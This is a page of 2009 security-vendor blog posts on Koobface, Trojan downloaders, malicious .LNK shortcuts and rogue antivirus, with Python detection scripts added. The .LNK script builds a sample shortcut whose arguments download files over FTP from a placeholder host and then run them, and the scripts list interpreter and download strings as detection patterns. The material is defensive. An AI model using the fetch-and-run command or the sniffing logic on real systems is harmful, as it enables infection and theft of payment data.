
May 2009 - Posts

The Allure of Social Networking

Published: May 31 2009, 08:54 PM | no comments
by Methusela Cebrian Ferrer

According to the Nielsen report Global Faces and Networked Places, “social networking has been the global consumer phenomenon of 2008. Two-thirds of the world’s internet population visits a social network or blogging site and the sector now accounts for almost 10% of all internet time”. The report also suggests that interest in social networking has surpassed the popularity of email.

From an information security perspective, this report agrees with our observations regarding the ever-increasing number of online threats we are seeing today. Facebook, as the world’s most popular social networking site, cannot escape attacks targeting its users.

Win32/Koobface appeared last year and is a family of worms that targets MySpace and Facebook users. Since then the threat has evolved into several versions that extend its social networking vector, as shown in Figure 01.

                       

Figure 01 – Koobface redirector script routine


This redirector script leads to a Koobface malware-serving website, which lures users into manually installing an executable file, as shown in Figure 02.

Figure 02 – Koobface malware-serving website offering users a fake Adobe Flash Player installer.

Spam activity on Facebook has been observed increasing since last week.

For more information on Koobface, please refer to our previous blogs listed below:
•    Healthy Malware Server Now Distributing Koobface
•    From Koobface: One Video Message Received

What about Twitter? The micro-blogging community is enjoying skyrocketing popularity; according to Nielsen, it recorded a 1,382% year-over-year increase in unique visitors (Feb 08 to Feb 09). Unfortunately this huge surge in popularity has attracted attackers, and we have seen serious attacks such as the Mikeyy worm and hacking incidents; there have also been phishing attacks and increasing spam activity.

Furthermore, we continue to see malware (especially porn-related) and spam distributed through bogus Blogspot blog profiles, as shown in Figure 03.

                              

Figure 03 – Bogus blog profiles

Security researchers are now dealing with many different attack vectors of varying technical difficulty. Organized cyber-criminals are mainly building these attacks through automation, which enables massive malware distribution and server-side polymorphism of binaries (EXE, PDF, SWF, etc.) to evade detection by security scanners.

Social networks and growing internet content (such as media) have encouraged users to spend more time on the internet, resulting in greater exposure to internet threats and a dramatic increase in malware. Visitors to social networking sites should therefore be on ‘high alert’ for socially engineered tricks that lead them to follow links to sites that could be serving malicious content, even when the links come from contacts thought to be trusted.

Furthermore, it is very important for everyone participating in social networking activities to report any suspicious or openly malicious activity, to help keep the internet safe.

My acknowledgement to Michael MacGuire and Kim Thorogood for their valuable contribution to this blog post.


By: Methusela Cebrian Ferrer
Methusela “Meths” Cebrian Ferrer joined CA ISBU in mid 2008 as Senior Researcher leading Internet Security Intelligence initiative. Her focus is proactive research, identifying emerging and prevalent threats to provide strategic security response through product solutions, internal & external awareness...

Trojan Downloaders – Crimeware perpetrators

Published: May 28 2009, 09:53 PM | no comments
by Zarestel Ferrer

Trojan downloaders have become one of the main malware categories dominating CA’s malware collection this year. Most of them are very small, some would say lightweight, and their only purpose is to download other malware.

Multiple Downloads

If a system is infected with malware that has “downloader” capabilities, it’s highly likely that the malware will fetch some more to install on the system. Below is an image of communication between a piece of malware and its server.

         

[Figure 1 – Downloader contacting server]

As you can see, when a trojan downloader communicates with its server the result can be multiple downloads of potentially malicious files, so the affected machine is exposed to further attacks. This behaviour is especially prevalent in crimeware, that is, malware written for financial gain.

Some downloaders employ extra checks when communicating with their servers. As shown on the left side of Figure 1, the malware files can be downloaded via port 88 rather than the usual port 80, while the right side of the image shows that the list of malware is only provided once the required information has been sent to the server via POST.
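The two server-side checks just described, a POST “gate” before the file list is handed out and payload fetches on a non-standard port, are also what makes this traffic stand out in a web proxy log. The script below is an added example, not code from the original post: it groups log entries by client and server, and raises an alert when a POST is followed within a short window by several executable downloads from the same server. The log format, client addresses and host names are constructed for the example and are not real indicators.

```python
"""Downloader-session detection over a constructed HTTP access log.

Added example, not code from the original post. Flags a client that POSTs to
a server and then fetches several executable payloads from it within WINDOW,
and notes whether the server port is non-standard (the post mentions 88).
"""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed log format: "<ISO time> <client> <method> <url> <status> <bytes> <content-type>"
# Hosts and addresses are placeholders, not real indicators.
SAMPLE_LOG = """\
2009-05-28T21:10:01 10.0.0.5 GET http://www.example.org/index.html 200 5120 text/html
2009-05-28T21:10:03 10.0.0.5 POST http://dl.example.invalid:88/gate.php 200 312 text/plain
2009-05-28T21:10:04 10.0.0.5 GET http://dl.example.invalid:88/files/1.exe 200 48128 application/octet-stream
2009-05-28T21:10:05 10.0.0.5 GET http://dl.example.invalid:88/files/2.exe 200 91136 application/octet-stream
2009-05-28T21:10:06 10.0.0.5 GET http://dl.example.invalid:88/files/3.exe 200 20480 application/octet-stream
2009-05-28T21:11:00 10.0.0.7 POST http://www.example.org/login 302 0 text/html
2009-05-28T21:11:02 10.0.0.7 GET http://www.example.org/home 200 7000 text/html
2009-05-28T21:30:00 10.0.0.9 GET http://cdn.example.org/setup.exe 200 900000 application/octet-stream
"""

EXECUTABLE_TYPES = {"application/octet-stream", "application/x-msdownload", "application/x-dosexec"}
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".pif")
WINDOW = timedelta(seconds=120)   # how long after the POST we look for payloads
MIN_PAYLOADS = 2                  # a single installer download is normal traffic


def parse_line(line):
    """Split one constructed log line into a record dict."""
    ts, client, method, url, status, size, ctype = line.split()
    parts = urlsplit(url)
    return {
        "time": datetime.fromisoformat(ts),
        "client": client,
        "method": method,
        "host": parts.hostname,
        "port": parts.port or 80,
        "path": parts.path,
        "status": int(status),
        "size": int(size),
        "ctype": ctype,
    }


def is_executable_fetch(rec):
    """Successful GET of something that looks like a Windows binary."""
    return rec["method"] == "GET" and rec["status"] == 200 and (
        rec["ctype"] in EXECUTABLE_TYPES or rec["path"].lower().endswith(EXECUTABLE_EXT)
    )


def find_downloader_sessions(log_text):
    """Return alerts as (client, host, port, n_payloads, nonstandard_port)."""
    records = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    records.sort(key=lambda r: r["time"])
    # Group by client + server so unrelated browsing does not mix in.
    by_session = defaultdict(list)
    for r in records:
        by_session[(r["client"], r["host"], r["port"])].append(r)

    alerts = []
    for (client, host, port), recs in by_session.items():
        for i, r in enumerate(recs):
            if r["method"] != "POST":
                continue
            # Executable fetches from the same server shortly after the POST gate.
            payloads = [
                x for x in recs[i + 1:]
                if x["time"] - r["time"] <= WINDOW and is_executable_fetch(x)
            ]
            if len(payloads) >= MIN_PAYLOADS:
                alerts.append((client, host, port, len(payloads), port not in (80, 443)))
                break  # one alert per client/server pair is enough
    return alerts


if __name__ == "__main__":
    for alert in find_downloader_sessions(SAMPLE_LOG):
        print("downloader-like session:", alert)
```

The POST-then-fetch sequencing is the important part: a lone download of an installer from a CDN (the last log line) is ordinary traffic and produces no alert, whereas a client that first reports in to a server and then pulls several binaries from it matches the downloader pattern regardless of which port the server chose.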

PDF and SWF downloaders

Exploit-laden PDF and SWF files are also on the list of Trojan downloaders, and their numbers have increased significantly because of server-side automation built to auto-generate such files.

         

[Figure 2 – Snippet of exploited PDF]

Check out our previous blog, “Malicious PDF Server Alive and Kicking” for more information.


Rogue Security Software Downloaders

Other notable Trojan downloaders are those that download rogue security software and push fake alert messages.

              

[Figure 3 – Downloader of fake antivirus programs]

These types of downloaders typically offer something of interest to unsuspecting users, such as fake codecs, porn and keygens. A downloader may also impersonate a legitimate application such as Flash Player.

Below is the HTTP access log recorded after a downloader program, disguised as a porn video provider, fetched a fake antivirus program. The downloader opens the porn site in the default browser and in the background downloads the fake antivirus, in this case WinPC Defender.

                       

[Figure 4 – HTTP access log]

For more information on rogue security software, take a look at our other blogs:

•    Spyware Protect 2009 copies malware descriptions
•    Double Jeopardy with Privacy Center
•    Warning: Dangerous Software – Antivirus XP Pro
•    Don’t Get Caught by the XP Police Antivirus!
•    Don’t be Fooled by Rogue Software Lifetime Offer


To be on the safe side, be extra cautious with your daily computer activities and remember to always keep your CA security software up-to-date.


By: Zarestel Ferrer
Zarestel Ferrer is a Senior Research Engineer with CA's Internet Security Business Unit (CA ISBU) based in Melbourne, Australia. Previous to CA, he worked as a software developer and then moved into security as a Senior Anti-virus Engineer at Trend Micro. He also worked for PC Tools Research as a...

Windows Shortcut .LNK - Another Misused File Format

Published: May 27 2009, 10:44 PM | no comments
by Methusela Cebrian Ferrer

Amidst the bulk of malicious executables we deal with every day, there is an interesting attack vector that uses Windows shortcuts, referred to as LNK files because of their .LNK file extension.

These are small files that contain information such as the name and path of the target program they represent. LNK files can also store the target’s file attributes, its local or network location, and command-line arguments.

A good example of a very common shortcut file you will find on the desktop is the one for Internet Explorer. However, telling visually whether a shortcut is clean or malicious is not easy, so you could end up executing the file before realising that it is suspicious.

In recent cases, malicious LNK files have been crafted as Trojan downloaders, sometimes disguised as a legitimate file, program or folder to persuade the target victim to execute them.


                                                                    

Figure 03 shows what you would see if you dragged a malicious LNK file into a text editor such as Notepad:

In this example, a short argument is passed to cmd.exe, which connects to a malicious FTP server (ftp://g***.vicp.net) to download and execute ntdet.exe in C:\ and pub.vbs in the Windows directory. This is just one example; it demonstrates how an attacker can craft a malicious LNK file, changing its icon and downloader behaviour to suit their intent.

Furthermore, Windows users may receive this threat through email, through a browser exploit, and/or bundled with other malicious files.

Take extra precautions with this kind of trick by following our recommendations below:

  •  Think twice before clicking on a shortcut file. If in doubt, simply drag the file into Notepad and check for any suspicious strings.
  •  Include the .LNK extension in your list of unwanted email attachments; this is a must for enterprise email blocking and filtering administration.
  •  Stay up to date with software patches to avoid exploit attack vectors.
  •  Make sure your security software is working and uses the latest signature update.
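The Notepad check works because the target path and command-line arguments are stored as plain strings inside the shortcut. The script below is an added example, not code from the original post: it reads those fields directly from the Shell Link binary layout (header, LinkFlags and the StringData section, as laid out in Microsoft’s MS-SHLLINK specification) and applies the heuristics an analyst would use on the result, namely whether the real target is a command interpreter and whether the arguments mention FTP or HTTP, script or executable names. Both .LNK samples it parses are constructed inside the script; the host name and file names in the suspicious one are placeholders modelled on the post’s description, not indicators from a real sample.

```python
"""Minimal Windows Shell Link (.LNK) parser with downloader heuristics.

Added example, not code from the original post. Field layout follows the
MS-SHLLINK specification; the sample shortcuts below are built here, not
taken from a real malicious file.
"""
import struct

# LinkFlags bits (ShellLinkHeader, offset 20)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}

# StringData sections appear in this fixed order when their flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

INTERPRETERS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "rundll32.exe"}


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags plus the StringData fields from a .LNK byte string."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid = struct.unpack_from("<I16s", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link header")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE

    if flags & HAS_LINK_TARGET_ID_LIST:          # uint16 size + ItemIDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # uint32 total size at its start
        pos += struct.unpack_from("<I", data, pos)[0]

    # StringData: uint16 character count, then the characters (UTF-16LE when
    # IsUnicode is set, otherwise ANSI), with no terminating NUL.
    unicode = bool(flags & IS_UNICODE)
    width = 2 if unicode else 1
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError(f"truncated {name} string")
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        pos += count * width
    return {"flags": flags, **fields}


def suspicious_reasons(info: dict) -> list:
    """Heuristics for the pattern in the post: interpreter target, fetch-and-run arguments."""
    reasons = []
    target = info.get("relative_path", "").replace("/", "\\").split("\\")[-1].lower()
    args = info.get("arguments", "").lower()
    if target in INTERPRETERS:
        reasons.append(f"target is an interpreter: {target}")
    for needle in ("ftp", "http://", "https://", ".exe", ".vbs", ".js", "-s:"):
        if needle in args:
            reasons.append(f"argument mentions {needle!r}")
    if len(args) > 200:
        reasons.append("unusually long argument string")
    return reasons


def build_lnk(relative_path: str, arguments: str, working_dir: str = "") -> bytes:
    """Build a minimal Unicode .LNK (header + StringData + terminal ExtraData block).
    Only used to construct sample input for this example."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS | (HAS_WORKING_DIR if working_dir else 0)
    header = struct.pack("<I16sI", HEADER_SIZE, LNK_CLSID, flags)
    header += b"\x00" * (HEADER_SIZE - len(header))  # attributes, times, size, icon, show, hotkey, reserved

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = s(relative_path) + (s(working_dir) if working_dir else b"") + s(arguments)
    return header + body + b"\x00\x00\x00\x00"


# Constructed samples: a benign document shortcut and a downloader-style one.
# The host and file names are placeholders, not real indicators.
BENIGN = build_lnk(r"..\..\Documents\report.docx", "", r"C:\Users\me\Documents")
SUSPECT = build_lnk(
    r"..\..\Windows\system32\cmd.exe",
    r"/c ftp -s:C:\s.txt ftp.example.invalid & C:\ntdet.exe",
    r"C:\Windows",
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        info = parse_lnk(blob)
        print(label, info.get("relative_path"), info.get("arguments"))
        for reason in suspicious_reasons(info):
            print("  !", reason)
```

Real shortcuts usually carry a LinkTargetIDList and LinkInfo block before the strings; the parser skips both using the sizes they declare, so it works on files pulled from a desktop as well as on the minimal samples built here. A shortcut whose displayed icon says “folder” but whose target resolves to cmd.exe is exactly the case the post describes.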

Stay Safe!


Spyware Protect 2009 copies malware descriptions

Published: May 27 2009, 10:19 PM | no comments
by Zarestel Ferrer

Rogue security software often uses skins to change its graphical user interface (GUI), so that a new version can be produced quickly once the previous one has become easily recognisable as fake security software. Sometimes the GUI is a replica of legitimate security software, to trick unsuspecting users.

Apart from GUIs, rogue security software also copies malware descriptions, without permission, from the websites of reputable security vendors. The Spyware Protect 2009 rogue security software has been spotted copying descriptions from the CA Spyware Encyclopedia.

      


Here are some examples, showing CA’s description first, followed by Spyware Protect 2009’s plagiarized version.

CA

    

Spyware Protect 2009

      


In both cases the descriptions are brief - coincidence?

Here is another example.

CA

    


Spyware Protect 2009

    

CA is not the only site from which Spyware Protect 2009 has copied malware descriptions, but this highlights how desperate the people behind this rogue security software are to trick users.

Since last week this rogue security software has been reported as massively distributed through compromised and malicious websites, so please be observant.

CA detects this malware as Win32/SpywareProtect2009. For a list of the files and registry entries dropped by this rogue security software, please refer to the CA Spyware Encyclopedia description page.

 


Double Jeopardy with Privacy Center

Published: May 20 2009, 12:25 AM | 1 Comment(s)
by Zarestel Ferrer

                            

[Figure 1 – Privacy Center GUI]

Recently we were investigating “Privacy Center”, rogue security software (scareware) distributed during the wave of “nude Rihanna photos” lures, when we saw the following window.

[Figure 2 – Privacy Center’s transaction processing page]


As you can see in Figure 2, this rogue security software costs $79.90; not cheap for a fake.
 
So we checked our website to compare the cost of our legitimate software with that of Privacy Center. Interestingly, our software costs about the same amount [Figure 3].

CA Internet Security Suite Plus - license valid for up to 5 PCs for $79.99 plus free PC Optimize Scan.

CA Antivirus Plus CA Antispyware 2009 - license valid for up to 3 PCs for $49.99 plus free PC Optimize Scan.

* prices are correct at time of writing

How many times have we all wondered, when shopping, whether the more expensive product is of superior quality to the cheaper one? The pricing of this rogue software taps into those same consumer insecurities. The distributors of Privacy Center have effectively hidden their rogue software amongst legitimate security products in the same price range.

[Figure 3 – CA Internet Security Suite Plus 2009 webpage]


Going back to the Privacy Center scareware, we noticed a couple of fraudulent claims.

"Secure" Page

         

[Figure 4 – Secured logos]

As you can see in Figure 4, the window displays a “Positive SSL Secured Website” logo, which is not what we saw in the background traffic. Using our tools to investigate this claim, we found that the process is not using HTTPS (HTTP over SSL) at all. Instead, as seen in Figure 5 below, it uses plain HTTP.

[Figure 5 – HTTP transaction]

I experimented by filling in both the personal information and payment information fields. It is NOT surprising that the personal information was transmitted in clear text, as shown by the sniffed transactions below [Figures 6, 7 & 8].

[Figure 6 – NOT secure transaction]

         

[Figure 7 – Packet stream]


           

[Figure 8 – Visible credit card details]

The personal information, first name, last name, city, country, state, address, zip code, email address and phone number, is all in clear text. In addition, the payment information, card number, expiration date and card verification value (CVV), is all visible to the sniffer.

In this scenario the victim has not only been ripped off by the scareware; something far more sinister has happened. The victim’s personal and payment information has been compromised and could now be used for further scams.
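To make concrete what an on-path observer recovers from a plain-HTTP checkout like the one in Figures 6 to 8, here is an added example, not code from the original post. It takes a captured HTTP POST (constructed here; the host, path and form field names are placeholders, not the real Privacy Center page), decides whether the transport was encrypted from the capture context rather than from any logo in the page, parses the form-encoded body, and validates the card number with the Luhn check so that an arbitrary 16-digit string is not mistaken for a card.

```python
"""What a passive sniffer recovers from a plain-HTTP payment form.

Added example, not code from the original post. The captured request below
is constructed; the host, path and field names are placeholders. The card
number is the well-known 4111... Visa test number, not a real card.
"""
from urllib.parse import parse_qs

BODY = ("first=Jane&last=Doe&email=jane%40example.org&phone=5551234"
        "&card=4111111111111111&exp=1211&cvv=123&amount=79.90")

# Constructed capture of the checkout POST exactly as it travels over port 80.
CAPTURED_REQUEST = (
    "POST /order/process.php HTTP/1.1\r\n"
    "Host: billing.example.invalid\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(BODY)}\r\n"
    "\r\n" + BODY
)

SENSITIVE_FIELDS = ("card", "exp", "cvv")


def luhn_valid(number: str) -> bool:
    """Luhn checksum used by payment card numbers (ISO/IEC 7812)."""
    digits = [int(c) for c in number if c.isdigit()]
    if len(digits) < 12:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def split_request(raw: str):
    """Return (request line, headers dict with lower-cased names, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def exposed_payment_data(raw: str, over_tls: bool) -> dict:
    """Report what an on-path observer can read from this request.

    over_tls must come from the capture itself (TLS record layer on the
    socket); a "secured" badge drawn in the page body says nothing about it.
    """
    if over_tls:
        return {"readable": False, "fields": {}}
    request_line, headers, body = split_request(raw)
    if "x-www-form-urlencoded" not in headers.get("content-type", ""):
        return {"readable": True, "fields": {}, "note": "body not form-encoded"}
    form = {k: v[0] for k, v in parse_qs(body).items()}
    fields = {k: form[k] for k in SENSITIVE_FIELDS if k in form}
    return {
        "readable": True,
        "request": request_line,
        "host": headers.get("host"),
        "fields": fields,
        "card_plausible": luhn_valid(fields.get("card", "")),
    }


if __name__ == "__main__":
    print(exposed_payment_data(CAPTURED_REQUEST, over_tls=False))
```

The same parser run over a TLS capture returns nothing readable, which is the only thing a “Positive SSL Secured” claim should ever have meant; the logo in Figure 4 is a picture, and the test for it is the transport, not the page.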

Privacy Center is detected by CA as Win32/PrivacyCenter.A and most of its components are detected as Win32/FakeAV variants.

Protect yourself by keeping your CA Security Products up to date!

 

*Thanks to Kim Thorogood for her valuable contribution to this blog entry
